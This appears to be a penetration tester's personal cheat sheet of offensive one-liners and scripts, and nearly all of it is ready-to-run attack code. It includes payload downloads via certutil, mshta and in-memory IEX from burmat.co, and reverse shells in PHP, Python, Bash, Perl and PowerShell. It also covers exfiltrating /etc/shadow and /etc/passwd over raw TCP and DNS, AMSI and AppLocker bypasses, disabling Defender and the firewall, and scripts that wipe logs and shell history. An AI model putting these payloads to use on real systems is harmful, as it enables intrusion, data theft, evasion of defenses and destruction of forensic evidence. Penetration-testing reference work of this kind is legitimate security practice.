# One-Liners and Dirty Scripts If I use it and it's not here, it's probably over here: ## File Transfers ### Python HTTP File Download If you have remote command execution on a box with python - something like this should do the trick: ```sh python -c "import urllib; f = urllib.URLopener(); f.retrieve('http:///meterpreter', '/tmp/meterpreter');" ``` or if it is a Windows box, it's not much different: ```powershell python.exe -c "import urllib; f = urllib.URLopener(); f.retrieve('http:///rs_powershell.exe', '/temp/rs_powershell.exe');" ``` ### BITS Download ```powershell Start-BitsTransfer -Source $URL -Destination $Path ``` ### PowerShell Download with Custom HTTP Headers ```powershell $wc = new-object system.net.WebClient; $wc.Headers.Add('User-Agent', "This is my agent, there is no one like it...") ; $wc.DownloadString("http://192.168.119.120/run.ps1"); ``` ### VBS HTTP File Download I got stuck with a borked up reverse shell on a Windows system with no file transfer methods and no modern scripting options. I scraped together the following one-liner to dump into my shell to get my payload over by writing a VBS script with echo statements to issue the download: ```vb echo Set o=CreateObject^("MSXML2.XMLHTTP"^):Set a=CreateObject^("ADODB.Stream"^):Set f=Createobject^("Scripting.FileSystemObject"^):o.open "GET", "http:///meterpreter.exe", 0:o.send^(^):If o.Status=200 Then > "C:\temp\download.vbs" &echo a.Open:a.Type=1:a.Write o.ResponseBody:a.Position=0:If f.Fileexists^("C:\temp\meterpreter.exe"^) Then f.DeleteFile "C:\temp\meterpreter.exe" >> "C:\temp\download.vbs" &echo a.SaveToFile "C:\temp\meterpreter.exe" >>"C:\temp\download.vbs" &echo End if >>"C:\temp\download.vbs" &cscript //B "C:\temp\download.vbs" &del /F /Q "C:\temp\download.vbs" ``` *(originally sourced from here:* [*http://karceh.blogspot.com/2011/06/vbs-download-file-from-internet.html*](http://karceh.blogspot.com/2011/06/vbs-download-file-from-internet.html)*)* ### Impacket's smbserver.py As always, the [impacket suite](https://github.com/SecureAuthCorp/impacket) shines. Use `smbserver.py` to open an SMB server on your host for file exfiltration: ```powershell smbserver.py burmat_exfil ./loot -username burmat -password burmat ## from the target: PS C:\> net use Q: \\10.1.1.123\burmat_exfil /user:burmat burmat PS C:\> mv .\bh.zip Q:\bh.zip PS C:\> net use Q: /delete ``` ### PERL HTTP File Download ```sh perl -e 'use File::Fetch; my $ff=File::Fetch->new(uri => "http://10.10.10.11/exploit.sh"); my $file = $ff->fetch() or die $ff->error;' ``` ### Nginx + PUT Request [Picked up from here](https://www.youtube.com/watch?v=ob9SgtFm6_g) (thanks @ippsec), you can start a nginx server that can accept PUT requests for file transfer via HTTP: ```shell cat /etc/nginx/sites-enabled/file_upload #server { # listen 8001 default_server; # server_name burmat.co; # location / { # root /var/www/upload/; # dav_methods PUT; # } #} service nginx start ``` Issue a `PUT` request from a remote system to upload files to `/var/www/upload` on your system. cURL: ```sh curl -X PUT http://192.168.1.87:8001/l00t.txt -F "data=@/home/user/l00t.txt" ``` PowerShell: ```powershell Invoke-RestMethod -Method PUT -Uri "http://10.10.14.12:8001/l00t.txt" -Body $(Get-Content l00t.txt) ``` ### Netcat File Transfer Because if Netcat is on the system, everything becomes easier: ```sh listener: nc -l -p 4444 > output.file sender: nc -w 3 [destination] 4444 < input.file ``` (and if it's not - go get it: `tftp -i 10.1.1.666 get nc.exe`) ### Certutil.exe Transfer Using `certutil.exe` is a clever way to get files down to a victim if you are attacking a Windows box and limited on methods: ```powershell certutil.exe -urlcache -split -f http://10.10.15.11/burmat.exe C:\temp\burmat.exe ``` You can also write a file from Base64 encoded text, too: ```powershell certutil.exe -decode C:\temp\payload.txt C:\temp\payload.dll regsvr32 /s /u C:\temp\payload.dll ``` (*Source:* [*http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html*](http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html) ) ### HTTP GET Request via Bash ```sh export RHOST=burmat.co export RPORT=12345 export LFILE=file_to_get bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ 3<>/dev/tcp/$RHOST/$RPORT \ | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' ``` ### RAW TCP Connection Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. ```sh export RHOST=burmat.co export RPORT=12345 export LFILE=file_to_get bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' ``` ### SQLMAP - User w/ FILE Privileges If you have SQLi with a user account that has `FILE` privileges, you can use `sqlmap` to transfer the file to disk without formulating an `INFO FILE` query yourself: ```bash sqlmap -r inject.req --dbms "mysql" --file-write shell.php --file-dest \\inetpub\\wwwroot\\shell.php ``` To see if you have the privilege, attempt (you might not have rights) to dump the `user` table: ```bash root@kali:~ ❯ sqlmap -r inj.req --dbms "mysql" -D mysql -T user -C User,File_Priv --dump .. SNIP .. [2 entries] +---------+-----------+ | User | File_Priv | +---------+-----------+ | burmat | Y | | root | Y | +---------+-----------+ ``` ### XML File Creation on Target (via copy/paste) This is a clever way to get XML over to the system using copy and paste, and writing that XML to file: ```powershell $console = [XML] @" "@ # write the xml to file: $console.save("C:\users\burmat\documents\console.xml") ``` ### Base64 #### Using Netcat ```bash # receiving host nc -lp 4443 | base64 -d > loot.txt # sender host base64 /etc/shadow > /dev/tcp/10.10.10.123/4443 ``` #### Copy and Paste ```bash ## encode from file with: base64 <<< $(cat shell.py) | tr -d "\n" ## decode to file with: echo -n "ZmlsZSBjb250ZW50IGhlcmUK" | base64 -d > shell.py ``` ## Shells / Reverse Shells Collection of reverse shell payloads for various languages and platforms. ### PHP Reverse Shell - Minified ```php array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while (1) { if (feof($sock)) { break; } if (feof($pipes[1])) { break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { $input = fread($pipes[1], $chunk_size); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { $input = fread($pipes[2], $chunk_size); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?> ``` *(originally sourced from:* [*https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php*](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)*)* ### Python Reverse Shell for Windows ```python import os,socket,subprocess,threading; def s2p(s, p): while True: data = s.recv(1024) if len(data) > 0: p.stdin.write(data) def p2s(s, p): while True: s.send(p.stdout.read(1)) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.11.0.37",4444)) p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) s2p_thread = threading.Thread(target=s2p, args=[s, p]) s2p_thread.daemon = True s2p_thread.start() p2s_thread = threading.Thread(target=p2s, args=[s, p]) p2s_thread.daemon = True p2s_thread.start() try: p.wait() except KeyboardInterrupt: s.close() ``` ### WinRM Ruby Shell ```ruby require 'winrm' conn = WinRM::Connection.new( endpoint: 'https://IP:PORT/wsman', transport: :ssl, user: 'username', password: 'password', :no_ssl_peer_verification => true ) command="" conn.shell(:powershell) do |shell| until command == "exit\n" do print "PS > " command = gets output = shell.run(command) do |stdout, stderr| STDOUT.print stdout STDERR.print stderr end end puts "Exiting with code #{output.exitcode}" end ``` *(originally sourced from:* [*https://github.com/WinRb/WinRM*](https://github.com/WinRb/WinRM)*)* ### Bash Reverse Shell (One-Liner) ```bash 0<&196;exec 196<>/dev/tcp/10.10.10.10/4444; sh <&196 >&196 2>&196 ``` ### Perl Reverse Shell ```perl perl -e 'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` ### PowerShell One-Liner Reverse Shell ```powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` ## Enumeration Various scripts and one-liners for system enumeration and reconnaissance. ### Finding Vulnerable Applications (Linux) This one is pretty dirty, and pretty awesome. Run a one-liner on your victim to generate a list of packages (`rpm` **or** `dpkg`) on the machine (`/tmp/packages.txt`). Copy this file to one that has `searchsploit`, and run the script. Generate the file with: ```sh FILE="packages.txt"; FILEPATH="/tmp/$FILE"; /usr/bin/rpm -q -f /usr/bin/rpm >/dev/null 2>&1; if [ $? -eq 0 ]; then rpm -qa --qf "%{NAME} %{VERSION}\n" | sort -u > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; else dpkg -l | grep ii | awk '{print $2 " " substr($3,1)}' > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; fi; echo ""; echo "[>] Done. Transfer $FILEPATH to your computer and run: "; echo ""; echo "./packages_compare.sh /path/to/$FILE"; echo ""; ``` *(thanks to* [*chryzsh*](https://github.com/chryzsh) *for doing the heavy lifting)* ### "Proc Mon" (IppSec) Script One of the handiest scripts to find running jobs and processes in real time. Thanks to [IppSec](https://twitter.com/ippsec) for sharing it with the world: ```sh #!/bin/bash IFS=$'\n' old_process=$(ps -eo command) while true; do new_process=$(ps -eo command) diff <(echo "$old_process") <(echo "$new_process") |grep [\<\>] sleep 1 old_process=$new_process done ``` ### SNMP Walker ```bash #!/bin/bash for ip in $(cat ~/Documents/labs/targets.txt | awk '/^[0-9]/ {print $1}'); do echo "Performing snmpwalk on public tree for" $ip " - Checking for System Processes" snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.1.6.0 > ~/Documents/labs/$ip/scans/systemprocesses.txt echo "Performing snmpwalk on public tree for" $ip " - Checking for Running Programs" snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.2 > ~/Documents/labs/$ip/scans/runningprograms.txt echo "Performing snmpwalk on public tree for" $ip " - Checking for Processes Path" snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.4 > ~/Documents/labs/$ip/scans/processespath.txt echo "Performing snmpwalk on public tree for" $ip " - Checking for Storage Units" snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.2.3.1.4 > ~/Documents/labs/$ip/scans/storageunits.txt echo "Performing snmpwalk on public tree for" $ip " - Checking for Software Name" snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.6.3.1.2 > ~/Documents/labs/$ip/scans/softwarename.txt echo "Performing snmpwalk on public tree for" $ip " - Checking for User Accounts" snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25 > ~/Documents/labs/$ip/scans/useraccounts.txt echo "Performing snmpwalk on public tree for" $ip " - Checking for TCP Local Ports" snmpwalk -c public -v1 $ip 1.3.6.1.2.1.6.13.1.3 > ~/Documents/labs/$ip/scans/tcplocalports.txt echo "Performing snmp-check scan for" $ip snmp-check $ip > ~/Documents/labs/$ip/scans/snmpcheck.txt echo "Cleaning up empty files..." find ~/Documents/labs/$ip/scans/ -size 0 -print0 |xargs -0 rm done ``` ### Ping Scan #### Linux Ping Scanning: You can use a regular-old for loop: ```bash for i in {1..254}; do ping -c 1 -W 1 172.1.1.$i | grep 'from'; done ``` Or you can try out the following Python script: ```python #!/usr/bin/python import multiprocessing, subprocess, os def pinger( job_q, results_q ): DEVNULL = open(os.devnull,'w') while True: ip = job_q.get() if ip is None: break try: subprocess.check_call(['ping','-c1',ip],stdout=DEVNULL) results_q.put(ip) except: pass if __name__ == '__main__': pool_size = 255 jobs = multiprocessing.Queue() results = multiprocessing.Queue() pool = [ multiprocessing.Process(target=pinger, args=(jobs,results)) for i in range(pool_size) ] for p in pool: p.start() for i in range(1,255): jobs.put('10.120.15.{0}'.format(i)) for p in pool: jobs.put(None) for p in pool: p.join() while not results.empty(): ip = results.get() print(ip) ``` #### Windows Ping Scan: Not the fastest or the cleanest, but it's an easy way to generate a ping scan from a `cmd` prompt: ```vb FOR /L %i IN (1,1,254) DO ping -n 1 192.168.1.%i | FIND /i "Reply" >> ips.txt ``` ## Remote Desktop (Enable/Add) ### Enable RDP ```powershell Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0 Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1 Enable-NetFirewallRule -DisplayGroup "Remote Desktop" ``` If you need to add your user to the group, you can use: `NET LOCALGROUP "Remote Desktop Users" domain\user /ADD`. And if you need to disable the firewall altogether: `NetSh Advfirewall set allprofiles state off` ## Defense Evasion ### AMSI Bypass (PowerShell) Disable AMSI in current PowerShell session: ```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` ### Disable Windows Defender ```powershell Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableIOAVProtection $true Set-MpPreference -DisableBehaviorMonitoring $true ``` ### Download and Execute in Memory Avoid writing to disk entirely: ```powershell IEX (New-Object Net.WebClient).DownloadString('http://burmat.co/payload.ps1') ``` ### Clear Windows Event Logs ```powershell wevtutil el | Foreach-Object {wevtutil cl "$_"} ``` ### LOLBin - Download with mshta ```cmd mshta vbscript:Close(Execute("GetObject(""script:http://burmat.co/payload.sct"")")) ``` ### LOLBin - Bypass AppLocker with InstallUtil ```powershell C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe ``` ## Data Exfiltration ### DNS Exfiltration Exfiltrate data through DNS queries (useful when HTTP/HTTPS is blocked): ```bash # Hex encode and exfil via DNS cat /etc/passwd | xxd -p | fold -w32 | while read line; do dig $line.burmat.co; done # Base64 encode and exfil cat sensitive.txt | base64 -w0 | fold -w32 | while read line; do nslookup $line.burmat.co; done ``` ## System Cleanup ### Purge Linux Logs ```bash #!/bin/sh /etc/init.d/sysklogd stop VARLOGS="auth.log boot btmp daemon.log debug dmesg kern.log mail.info mail.log mail.warn messages syslog udev wtmp" cd /var/log for ii in $VARLOGS; do echo -n > $ii rm -f $ii.? $ii.?.gz done /etc/init.d/samba stop rm -f /var/log/samba/* rm -f /var/lib/dhcp3/* for ii in /var/log/proftpd/* /var/log/postgresql/* /var/log/apache2/*; do echo -n > $ii done ``` ### Covering Tracks ```bash #!/bin/bash echo "COVERING TRACKS" echo "clearing /var/log/auth.log" echo "" > /var/log/auth.log echo "clearing ~/.bash_history" echo "" > ~/.bash_history echo "clearing /root/.bash_history" echo "" > /root/.bash_history echo "removing ~/.bash_history" rm ~/.bash_history -rf echo "removing /tmp/" rm -R /tmp/* echo "clearing /var/log/messages" echo "" > /var/log/messages echo "clearing command history" history -c ```